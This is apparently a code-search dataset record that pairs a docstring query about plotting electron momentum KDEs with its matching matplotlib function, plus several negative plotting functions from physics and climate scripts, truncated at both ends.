len(ax.get_ymajorticklabels()) - 1\n if min_y<0: lenticks -= 1\n if lenticks < 5:\n from matplotlib.ticker import AutoMinorLocator as AML\n ax.yaxis.set_minor_locator(AML())\n pl.grid(which='both', color='w', lw=0.25, axis='y', zorder=12)\n pl.ylabel(r'$\\mathrm{\\langle{\\frac{ \\partial U } { \\partial \\lambda }}\\rangle_{\\lambda}\\/%s}$' % P.units, fontsize=20, color='#151B54')\n pl.annotate('$\\mathit{\\lambda}$', xy=(0, 0), xytext=(0.5, -0.05), size=18, textcoords='axes fraction', va='top', ha='center', color='#151B54')\n if not P.software.title()=='Sire':\n lege = ax.legend(prop=FP(size=14), frameon=False, loc=1)\n for l in lege.legendHandles:\n l.set_linewidth(10)\n pl.savefig(os.path.join(P.output_directory, 'dhdl_TI.pdf'))\n pl.close(fig)\n return", "def plot(self):\n\t\tself.plotOfSpect().plot()", "def make_plot(solution, t, plot_Ts, plot_T1, plot_T2, xaxis, cc, delta_cc, albedo,delta_albedo\\\n , em1, delta_em1, em2, delta_em2):\n\n plt.close('all')\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n \n if xaxis == 'cloud cover':\n inc_cc = []\n for i in range(len(solution[0,:])):\n inc_cc.append(cc + (i*delta_cc)/calcs_per_timestep)\n\n if plot_Ts == 'On': ax1.plot(inc_cc,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_cc,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_cc,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n\n elif xaxis == 'time':\n \n #for i in range(len(solution[0,:])):\n #t.append(i*(timestep/calcs_per_timestep))\n \n if plot_Ts == 'On': ax1.plot(t,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(t,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(t,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n \n elif xaxis == 'albedo':\n inc_alb = []\n for i in range(len(solution[0,:])):\n inc_alb.append(albedo+(i*delta_albedo)/calcs_per_timestep)\n \n if plot_Ts == 'On': ax1.plot(inc_alb,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_alb,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_alb,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 
'Off': raise ValueError('No y variable selected')\n \n elif xaxis == 'epsilon1':\n inc_em = []\n for i in range(len(solution[0,:])):\n inc_em.append(em1+(i*delta_em1)/calcs_per_timestep)\n \n if plot_Ts == 'On': ax1.plot(inc_em,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_em,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_em,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n \n elif xaxis == 'epsilon2':\n inc_em = []\n for i in range(len(solution[0,:])):\n inc_em.append(em2+(i*delta_em2)/calcs_per_timestep)\n \n if plot_Ts == 'On': ax1.plot(inc_em,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_em,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_em,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n \n else: raise ValueError('No x axis selected')\n \n fig.suptitle('Global Average Temperature')\n ax1.set_title(f'Final Surface Temperature = {round(solution[0,-1],2)} K')\n ax1.legend()\n\n if xaxis == 'cloud cover': ax1.set_xlabel('Cloud Cover (%)')\n elif xaxis == 'time': ax1.set_xlabel('Time (years)')\n elif xaxis == 'albedo': ax1.set_xlabel('Albedo')\n elif xaxis == 'epsilon1': ax1.set_xlabel(u'\\u03B5\\u2081')\n elif xaxis == 'epsilon2': ax1.set_xlabel(u'\\u03B5\\u2082')\n plt.ylabel('Temerature (K)')\n return fig" ]
[ "0.6821178", "0.64246243", "0.6286595", "0.626816", "0.6249688", "0.6224722", "0.6198306", "0.6154236", "0.613358", "0.61210513", "0.6096487", "0.6086529", "0.6069941", "0.598622", "0.59854215", "0.5982351", "0.59644985", "0.59618616", "0.59519553", "0.59491116", "0.59424275", "0.592379", "0.5919446", "0.59140146", "0.59031373", "0.58884037", "0.5883146", "0.5882376", "0.58612806", "0.5821942" ]
0.65401083
1
Make a paper plot for the momentum KDE of the low-field and full-drift solutions.
def momentum_kde_paperplot(fields):\n    # Paper figure: one panel per applied field (expects exactly three fields), comparing the low-field ('2') and full-drift ('3') momentum KDEs.\n    # Relies on module-level imports: numpy as np, matplotlib.pyplot as plt, FormatStrFormatter from matplotlib.ticker, and the project parameter module pp.\n    fig, (ax1, ax2, ax3) = plt.subplots(nrows=3, sharex=True)\n    axisList = [ax1, ax2, ax3]\n    props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n    for i, ee in enumerate(fields):\n        ee_Vcm = ee / 100  # convert the field to V/cm for the panel annotation\n        textstr = r'$E_{k_x}\, = \, %.1f \, V \, cm^{-1}$' % ee_Vcm\n        # Load the precomputed KDEs for this field ('2' = low-field solution, '3' = full-drift solution)\n        k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + "E_{:.1e}.npy".format(ee))\n        kdist_f0_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '2_' + "E_{:.1e}.npy".format(ee))\n        kdist_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '2_' + "E_{:.1e}.npy".format(ee))\n        kdist_f0_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '3_' + "E_{:.1e}.npy".format(ee))  # loaded for parity; all curves below are normalized to the low-field equilibrium KDE\n        kdist_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '3_' + "E_{:.1e}.npy".format(ee))\n        # Filled deviational distributions plus the equilibrium KDE, normalized to the equilibrium peak\n        axisList[i].fill(k_ax, kdist_2 / np.max(kdist_f0_2), '--', linewidth=1, alpha=0.6, label='Cold ' + r'$e^{-}$ ' + r'$\Delta f$', color='blue')\n        axisList[i].fill(k_ax, kdist_3 / np.max(kdist_f0_2), '--', linewidth=1, alpha=0.6, label='Warm ' + r'$e^{-}$ ' + r'$\Delta f$', color='red')\n        axisList[i].plot(k_ax, kdist_2 / np.max(kdist_f0_2), '-', linewidth=1, color='blue')\n        axisList[i].plot(k_ax, kdist_3 / np.max(kdist_f0_2), '-', linewidth=1, color='red')\n        axisList[i].plot(k_ax, kdist_f0_2 / np.max(kdist_f0_2), '-', linewidth=1, label='Equilibrium Dist.', color='black')\n        axisList[i].yaxis.set_major_formatter(FormatStrFormatter('%g'))\n        axisList[i].locator_params(axis='y', nbins=3)\n        axisList[i].locator_params(axis='x', nbins=5)\n        axisList[i].set_xlim(-0.06, 0.06)\n        axisList[i].text(0.02, 0.92, textstr, transform=axisList[i].transAxes, verticalalignment='top', bbox=props)\n    plt.xlabel(r'$k_x \, \, (\AA^{-1})$')\n    ax2.set_ylabel('Occupation Probability (norm.)')\n    axisList[0].legend(loc="upper right")\n    plt.savefig(pp.figureLoc + 'momentum_KDE.png', bbox_inches='tight', dpi=600)
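# Usage sketch: assumes numpy as np is in scope alongside the module-level imports noted above, and that the matching KDE .npy files exist under pp.outputLoc; the three field values are hypothetical.\nfields = np.array([1e2, 1e4, 4e4])  # applied E-fields in V/m, one per subplot panel\nmomentum_kde_paperplot(fields)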
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def momentum_kde2_paperplot(fields):\n plt.figure(figsize=(2.65, 2.5))\n ax = plt.axes([0.18, 0.17, 0.8, 0.8])\n colorList = [med_color, high_color]\n lw = 1.5\n i = 0\n meankx_2 = []\n meankx_3 = []\n k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + \"E_{:.1e}.npy\".format(fields[0]))\n # ax.plot(k_ax, np.zeros(len(k_ax)), '-', linewidth=lw, color=eq_color, label='Equilibrium')\n # ax.plot(k_ax, np.zeros(len(k_ax)), '-', linewidth=lw, color=eq_color)\n ax.axhline(0, color='black', linestyle='--', linewidth=0.5)\n # ax.axvline(0, color='gray', linewidth=0.8, alpha=0.5)\n for ee in fields:\n ee_Vcm = ee/100\n k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_f0_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_f0_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n kdist_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '3_' + \"E_{:.1e}.npy\".format(ee))\n\n chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n meankx_2.append(utilities.mean_kx(chi_2_i, electron_df))\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n meankx_3.append(utilities.mean_kx(chi_3_i, electron_df))\n\n ax.plot(k_ax, kdist_2, '--', linewidth=lw, color=colorList[i], label='Cold '+r'{:.0f} '.format(ee/100)+r'$\\rm V cm^{-1}$')\n ax.plot(k_ax, kdist_3, '-', linewidth=lw,color=colorList[i], label='Warm '+r'{:.0f} '.format(ee/100)+r'$\\rm V cm^{-1}$')\n i = i + 1\n # ax.plot(k_ax, kdist_f0_3, '--', linewidth=lw, color='black', label=r'$f_0$')\n # ax.plot(meankx_2,np.mean(abs(kdist_2))*np.ones(len(meankx_3)), '-', linewidth=lw, color='black')\n # ax.plot(meankx_3,np.mean(abs(kdist_3))*np.ones(len(meankx_3)), '-', linewidth=lw, color='black')\n\n ax.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))\n ax.locator_params(axis='y', nbins=6)\n ax.locator_params(axis='x', nbins=6)\n # ax.tick_params(direction='in')\n ax.set_xlim(-0.085, 0.081)\n\n plt.xlabel(r'$\\rm k_x \\, \\, (\\AA^{-1})$')\n plt.ylabel(r'Deviational occupation $\\rm \\Delta f_{\\mathbf{k}}$')\n # plt.grid(lw=0.8, linestyle='dotted')\n # plt.ylabel(r'$\\delta f_{\\mathbf{k}}/f_{\\mathbf{k}}^0$')\n # plt.ylim([-1,1])\n plt.legend(frameon=False,prop={'size':different_small_size})\n plt.savefig(pp.figureLoc+'momentum_KDE2.png', dpi=600)", "def energy_kde_paperplot(fields,df):\n plt.figure()\n i = 0\n colorList = ['dodgerblue','tomato']\n lw = 2\n\n meanE_2 = []\n meanE_3 = []\n mup = np.min(df['energy [eV]']) - pp.mu\n chi_0 = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(fields[0]))\n g_en_axis, _, _, _, _, _, _, _, _, _, _, _, _, _ = \\\n occupation_plotter.occupation_v_energy_sep(chi_0, df['energy [eV]'].values, df)\n plt.plot(g_en_axis - np.min(df['energy [eV]']), np.zeros(len(g_en_axis)), '-', color='black', lineWidth=lw,label='Equilibrium')\n\n for ee in fields:\n chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n # meanE_2 = utilities.mean_energy(chi_2_i,df)\n g_en_axis, g_ftot, g_chiax, g_f0ax, _, _, _, _, _, _, _, _,_,_ = \\\n occupation_plotter.occupation_v_energy_sep(chi_2_i, df['energy [eV]'].values, df)\n plt.plot(g_en_axis - np.min(df['energy [eV]']), g_chiax,'--',color = colorList[i],lineWidth=lw,label=r'Low Field {:.0f} 
'.format(ee/100)+r'$V \\, cm^{-1}$')\n print(integrate.trapz(g_chiax,g_en_axis))\n\n # plt.plot(meanE_2-np.min(df['energy [eV]']),0,'.')\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n g_en_axis, g_ftot, g_chiax, g_f0ax, _, _, _, _, _, _, _, _,_,_ = \\\n occupation_plotter.occupation_v_energy_sep(chi_3_i, df['energy [eV]'].values, df)\n plt.plot(g_en_axis - np.min(df['energy [eV]']), g_chiax,color = colorList[i],lineWidth=lw,label=r'Full Drift {:.0f} '.format(ee/100)+r'$V \\, cm^{-1}$')\n print(integrate.trapz(g_chiax,g_en_axis))\n\n i = i + 1\n # plt.plot(g_en_axis - np.min(df['energy [eV]']), g_f0ax, '--', color='black', lineWidth=lw,label=r'$f_0$')\n\n plt.legend()\n # plt.ylim([-0.02, 0.015])\n plt.xlabel(r'Energy above CBM ($eV$)')\n plt.ylabel(r'Deviational occupation $\\delta f_{\\mathbf{k}}$ (norm.)')\n # plt.ylabel(r'$\\delta f_{\\mathbf{k}}/f_{\\mathbf{k}}^0$')\n plt.savefig(pp.figureLoc+'energy_KDE.png', bbox_inches='tight',dpi=600)\n\n plt.figure()\n plt.plot(g_en_axis,g_chiax)\n\n plt.figure()\n Z, xedges, yedges = np.histogram2d(df['kx [1/A]']*chi_3_i,df['ky [1/A]']*chi_3_i)\n plt.pcolormesh(xedges, yedges, Z.T)\n\n from scipy.stats.kde import gaussian_kde\n g_inds,_,_ = utilities.gaas_split_valleys(df,False)\n g_df = df.loc[g_inds]\n\n x = g_df['kx [1/A]']*(chi_3_i[g_inds]+g_df['k_FD'])\n y = g_df['ky [1/A]']*(chi_3_i[g_inds]+g_df['k_FD'])\n\n # y = g_df['energy [eV]']*(chi_3_i[g_inds]+g_df['k_FD'])\n k = gaussian_kde(np.vstack([x, y]))\n xi, yi = np.mgrid[x.min():x.max():x.size ** 0.5 * 1j, y.min():y.max():y.size ** 0.5 * 1j]\n zi = k(np.vstack([xi.flatten(), yi.flatten()]))\n\n fig = plt.figure(figsize=(7, 8))\n ax1 = fig.add_subplot(211)\n ax2 = fig.add_subplot(212)\n\n # alpha=0.5 will make the plots semitransparent\n ax1.pcolormesh(xi, yi, zi.reshape(xi.shape), alpha=0.5)\n ax2.contourf(xi, yi, zi.reshape(xi.shape), alpha=0.5)\n\n ax1.set_xlim(x.min(), x.max())\n ax1.set_ylim(y.min(), y.max())\n ax2.set_xlim(x.min(), x.max())\n ax2.set_ylim(y.min(), y.max())", "def plot_dereddening():\n extinction_coefficients = {'2365-2764-1': np.array([0.2622, 0.844]), '4109-638-1': np.array([0.0524, 0.1576]),\n '2058-56-1': np.array([0.0751, 0.248]), '3642-2459-1': np.array([0.1907, 0.608]),\n '3999-1391-1': np.array([0.3911, 1.2480]), '2607-1448-1': np.array([0.0430, 0.1310])}\n cepheids = {'2365-2764-1': np.array([0.959, 2.09]), '4109-638-1': np.array([0.705, 2.385]), '2058-56-1':\n np.array([1.222, 1.333]), '3642-2459-1': np.array([1.088, 2.0518]), '3999-1391-1':\n np.array([1.360, 1.2567]), '2607-1448-1': np.array([1.484, 0.6963])}\n periods = {'2365-2764-1': 1.61, '4109-638-1': 15.31, '2058-56-1': 63.08, '3642-2459-1': 1.86, '3999-1391-1': 24.98,\n '2607-1448-1': 8.54}\n max_periods = max(periods.values())\n\n new_positions_bv_mv = [] # in M_V vs B-V space\n colors = []\n theoretical_position = []\n for obj in extinction_coefficients.keys():\n # new_positions_bv_mv.append(cepheids[obj]-extinction_coefficients[obj])\n new_positions_bv_mv.append(cepheids[obj])\n colors.append(periods[obj]/max_periods)\n theoretical_position.append(-2.78*np.log10(periods[obj])-1.35)\n\n for pos in range(len(new_positions_bv_mv)):\n plt.scatter(new_positions_bv_mv[pos][0], new_positions_bv_mv[pos][1], marker='^', facecolor='w', s=40)\n plt.scatter(new_positions_bv_mv[pos][0], theoretical_position[pos], marker='o', facecolor='r', s=50)\n return new_positions_bv_mv, colors", "def plot_kde():\n f, (ax1, ax2) = plt.subplots(1, 2, sharey=True, sharex=True)\n 
sns.kdeplot(data.data.numpy()[:,0], data.data.numpy()[:,1], color=\"r\", shade=True, ax=ax1)\n sns.kdeplot(dec_mean.data.numpy()[:,0], dec_mean.data.numpy()[:,1], color=\"b\", shade=True, ax=ax2)\n plt.show()\n plt.pause(1e-6)\n plt.gcf().clear()", "def plot_field_uncertainties():\n\n resize_size = (1000, 1000)\n\n\n dirs = [os.path.join(path_to_here, '../data/landscape_visualizations/{}/{}/'.format(drug_name, j)) for j in ['original', 'repeat_a', 'repeat_b']]\n if drug_name == 'DMSO':\n dirs = [os.path.join(path_to_here, '../data/landscape_visualizations/{}/{}/30_hours/'.format(drug_name, j)) for j in ['original', 'repeat_a', 'repeat_b']]\n\n def transform(x):\n if type(x) is np.ndarray:\n x = change_array_lims(x)\n x = np.log(x)\n return x\n\n F_unc_vmin = -7\n F_unc_vmax = -4\n sigma_vmin = -5\n sigma_vmax = 0 #0.4\n sigma_unc_vmin = -6\n sigma_unc_vmax = -2\n\n fig_Fs = [plt.figure() for _ in range(3)]\n fig_uncertainty = plt.figure()\n sigma_lists, F_arrays = [], []\n for idx_fig, dir in enumerate(dirs):\n\n p_list = _load_and_resize_list(dir+'p_list_0.pickle')\n D_list = _load_and_resize_list(dir+'D_list_0.pickle')\n U_array = pickle.load(open(dir+'U.pickle', 'rb'))\n U_array = cv2.resize(U_array, resize_size, interpolation = cv2.INTER_LINEAR)\n Gx, Gy = np.gradient(U_array, 26./resize_size[0], 26./resize_size[0]) # gradients with respect to x and y\n F_array = (Gx**2+Gy**2)**.5 # gradient magnitude\n F_array[np.isinf(F_array)] = np.nan\n F_array[p_list[-1]<1e-3]=np.nan # final PDF\n sigma_list = []\n for j in range(9):\n arr = D_list[2*j] # current PDF\n arr[p_list[j]<1e-3]=np.nan\n sigma_list.append(np.sqrt(2*arr))\n\n\n sigma_lists.append(sigma_list)\n F_arrays.append(F_array)\n\n ax = fig_Fs[idx_fig].add_subplot(111)\n ax.imshow(transform(F_array)[::-1, :], cmap = cmap, vmin = -4.6, vmax = -2)\n ax.set_title(dir)\n\n all_axes = [i for j in fig_Fs for i in j.axes]\n for ax in all_axes:\n ax.axis('off')\n\n # uncertainties\n\n std = np.std(F_arrays, axis = 0)\n ax = fig_uncertainty.add_subplot(121)\n ax.imshow(transform(std)[::-1, :], cmap = cmap, vmin = F_unc_vmin, vmax = F_unc_vmax)\n ax.set_title('F_uncertainty')\n\n fig_sigma = plt.figure()\n ax = fig_sigma.add_subplot(111)\n ax.imshow(transform(np.nanmean(sigma_lists[0], axis = 0))[::-1, :], cmap = cmap, vmin = sigma_vmin, vmax = sigma_vmax) # index 0 (i.3 'original' is corresponds to the landscapes in other figures)\n ax.set_title('sigma_mean')\n\n sigma_means = [np.nanmean(sigma_list, axis = 0) for sigma_list in sigma_lists]\n std_array = np.nanstd(sigma_means, axis = 0)\n ax = fig_uncertainty.add_subplot(122)\n ax.imshow(transform(std_array)[::-1, :], cmap = cmap, vmin = sigma_unc_vmin, vmax = sigma_unc_vmax)\n ax.set_title('sigma_uncertainty')\n\n fig_sigma.savefig(path_to_here+'/../outputs/{}_mean_sigma.png'.format(drug_name), dpi = 1200)\n fig_uncertainty.savefig(path_to_here+'/../outputs/{}_uncertainties.png'.format(drug_name), dpi = 1200)", "def small_signal_mobility_paperplot(fieldVector, freqVector, df):\n vcm = np.array(fieldVector)*1e-2\n n = utilities.calculate_density(df)\n lw = 1.5\n fig, ax = plt.subplots()\n for freq in freqVector:\n cond = []\n mu_3 = []\n for ee in fieldVector:\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n ax.plot(vcm, np.array(np.real(cond))/c.e/n*100**2, 
'-', label='{:.1f} GHz'.format(freq),linewidth=lw)\n ax.plot(vcm,mu_3,'-',label = 'Ohmic Mobility',linewidth=lw)\n plt.xlabel(r'Field ($\\rm V \\, cm^{-1}$)')\n plt.ylabel(r'AC Mobility ($\\rm cm^2 \\, V^{-1} \\, s^{-1}$)')\n plt.ylim([-0.05*np.max(mu_3),np.max(mu_3)*1.2])\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.legend(ncol=3,loc='lower center')\n plt.savefig(pp.figureLoc+'ac_mobility.png', bbox_inches='tight',dpi=600)\n\n\n plt.figure(figsize=(2.05, 2.5))\n ax = plt.axes([0.21, 0.19, 0.75, 0.75])\n i = 0\n for ee in fieldVector:\n colorList = [eq_color, med_color, high_color]\n cond = []\n cond_linear = []\n mu_3 = []\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n ax.plot(freqVector, np.array(np.real(cond))/c.e/n*100**2/1000, '-',\n label='{:.0f} '.format(ee/100)+r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n i = i + 1\n\n plt.xlabel(r'Frequency (GHz)')\n plt.ylabel(r'$\\Re(\\rm AC\\ mobility$) (1000 $\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend(frameon=False)\n plt.ylim([0, 20])\n plt.xlim([freqs[0], freqs[-1]])\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n ax.yaxis.set_major_formatter(FormatStrFormatter('%.0f'))\n plt.xlim([freqVector[0],freqVector[-1]])\n locmaj = matplotlib.ticker.LogLocator(base=10, numticks=6)\n ax.xaxis.set_major_locator(locmaj)\n locmin = matplotlib.ticker.LogLocator(base=10.0, subs=np.arange(2, 10) * .1,\n numticks=100)\n ax.xaxis.set_minor_locator(locmin)\n plt.savefig(pp.figureLoc+'Real_ac_mobility.png',dpi=600)\n\n fig, ax = plt.subplots()\n i = 0\n for ee in fieldVector:\n colorList = ['black', 'dodgerblue', 'tomato']\n cond = []\n cond_linear = []\n mu_3 = []\n\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(\n np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(\n pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n\n ax.plot(freqVector, np.array(np.imag(cond)) / c.e / n * 100 ** 2, '-',\n label='{:.0f} '.format(ee / 100) + r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n\n i = i + 1\n plt.xlabel(r'Frequency ($\\rm GHz$)')\n plt.ylabel(r'$\\Im \\, [\\mu_{\\omega}]$ ($\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend(frameon=False)\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n 
plt.savefig(pp.figureLoc + 'Imag_ac_mobility.png', bbox_inches='tight', dpi=600)\n\n\n fig, ax = plt.subplots()\n i = 0\n for ee in fieldVector:\n colorList = ['black', 'dodgerblue', 'tomato']\n cond = []\n cond_linear = []\n mu_3 = []\n\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(\n np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(\n pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n\n ax.plot(freqVector, np.array(np.arctan(np.imag(cond)/np.real(cond)))/np.pi, '-',\n label='{:.0f} '.format(ee / 100) + r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n i = i + 1\n ax.yaxis.set_major_formatter(tck.FormatStrFormatter('%g $\\pi$'))\n ax.yaxis.set_major_locator(tck.MultipleLocator(base=1.0))\n plt.xlabel(r'Frequency ($\\rm GHz$)')\n plt.ylabel(r'AC Mobility Phase Angle (Radians)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend()\n yloc = plt.MaxNLocator(6)\n ax.yaxis.set_major_locator(yloc)\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.savefig(pp.figureLoc + 'Phase_ac_mobility.png', bbox_inches='tight', dpi=600)", "def plot_perturbation(wind=7, mldp=30, pref=\"ca\"):\n pl.clf()\n fig,axes = pl.subplots(3, 1, sharex=True, num=1,figsize=(6,6))\n model_kws = dict(pref=pref, reg=\"pert\",\n temp=None, salt=None, wind=wind, mldp=mldp,\n deepmld1={\"pert\":0, \"tpos\":165},\n deepmld2={\"pert\":0, \"tpos\":553},\n uppwell1={\"pert\":0, \"tpos\":165, \"pdays\":5},\n uppwell2={\"pert\":0, \"tpos\":553, \"pdays\":5})\n md = run_model(**model_kws)\n plot_timeseries(md, axes=axes, alpha=0.5) \n if pref == \"ca\":\n preftxt = \"CCS\"\n model_kws[\"uppwell1\"][\"pert\"] = 82.5\n model_kws[\"uppwell2\"][\"pert\"] = 165\n else:\n preftxt = \"NWA\"\n model_kws[\"deepmld1\"][\"pert\"] = 17\n model_kws[\"deepmld2\"][\"pert\"] = 34\n md = run_model(**model_kws)\n plot_timeseries(md, axes=axes, alpha=1)\n pl.suptitle(\n f\"Perturbations, temp and salt for {preftxt}, wind:{wind}m/s, mld:{mldp}m\")\n pl.savefig(os.path.join(FIGDIR, f\"pertubation_timeseries_{pref}.pdf\"))", "def fig_2():\n epoch = 3\n N = 60000\n Nr = N\n K = 32\n n_iter = 256\n Nstar = 16\n data = 'dr10'\n factor = 100.\n features = ['psf_mag', 'model_colors', 'psf_minus_model']\n filters = ['r', 'ug gr ri iz', 'ugriz']\n message = 'pm_mc_pmm_r_all_all'\n model = 'xdmodel_%s_%d_%d_%d_%d_%s.pkl' % (data, Nr, K, n_iter, Nstar,\n message)\n model = os.environ['xddata'] + model\n figname = os.environ['xdplots'] + 'fig2.png'\n posteriors_plot(model, features, filters, figname, idx=-3)", "def linear_mobility_paperplot(fieldVector,df):\n vcm = np.array(fieldVector) * 1e-2\n lw = 1.5\n mu_1 = []\n mu_2 = []\n mu_3 = []\n meanE_1 = []\n meanE_2 = []\n meanE_3 = []\n for ee in fieldVector:\n chi_1_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '1_' + \"E_{:.1e}.npy\".format(ee))\n chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n 
